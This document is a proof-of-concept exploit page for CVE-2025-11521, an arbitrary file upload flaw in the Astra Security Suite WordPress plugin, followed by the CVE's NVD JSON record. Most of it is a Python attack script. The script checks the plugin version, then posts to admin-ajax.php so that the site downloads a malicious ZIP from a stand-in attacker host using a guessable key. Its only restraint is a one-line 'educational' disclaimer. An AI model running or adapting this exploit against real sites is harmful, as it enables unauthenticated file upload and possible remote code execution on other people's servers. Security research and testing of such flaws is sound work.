CVE-2025-11521

#!/usr/bin/env python3 """ CVE-2025-11521 PoC - Astra Security Suite WordPress Plugin Arbitrary File Upload Note: This PoC is for educational and authorized testing purposes only. """ import requests import json import sys TARGET_URL = "http://target-wordpress-site.com" PLUGIN_PATH = "/wp-content/plugins/getastra" MALICIOUS_ZIP_URL = "http://attacker-server.com/malicious.zip" def check_version(target_url): """Check if target is running vulnerable version""" response = requests.get(f"{target_url}{PLUGIN_PATH}/README.md", timeout=10) return "0.2" in response.text if response.status_code == 200 else None def exploit_zip_upload(target_url, malicious_zip_url): """ Exploit the arbitrary file upload vulnerability by sending a crafted request with a malicious ZIP URL """ endpoint = f"{target_url}/wp-admin/admin-ajax.php" # The vulnerable parameter names may vary payload = { "action": "astra_download_backup", "url": malicious_zip_url, "key": "guessable_key_here" # Easily guessable key } try: response = requests.post(endpoint, data=payload, timeout=30) if response.status_code == 200: result = response.json() print(f"[+] Response: {json.dumps(result, indent=2)}") return True except requests.RequestException as e: print(f"[-] Request failed: {e}") return False def main(): if len(sys.argv) < 2: print("Usage: python3 cve-2025-11521-poc.py <target_url>") sys.exit(1) target = sys.argv[1] print(f"[*] Testing target: {target}") if check_version(target): print("[+] Target appears to be vulnerable (version <= 0.2)") print("[*] Attempting exploitation...") exploit_zip_upload(target, MALICIOUS_ZIP_URL) else: print("[-] Target may not be vulnerable or is not reachable") if __name__ == "__main__": main()

{"cve": {"id": "CVE-2025-11521", "sourceIdentifier": "[email protected]", "published": "2025-11-11T04:15:41.797", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Astra Security Suite – Firewall & Malware Scan plugin for WordPress is vulnerable to arbitrary file uploads due to insufficient validation of remote URLs for zip downloads and an easily guessable key in all versions up to, and including, 0.2. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-285"}]}], "references": [{"url": "https://wordpress.org/plugins/getastra/", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/f99a6b5c-e95d-49d0-a4b2-1d7188447da1?source=cve", "source": "[email protected]"}]}}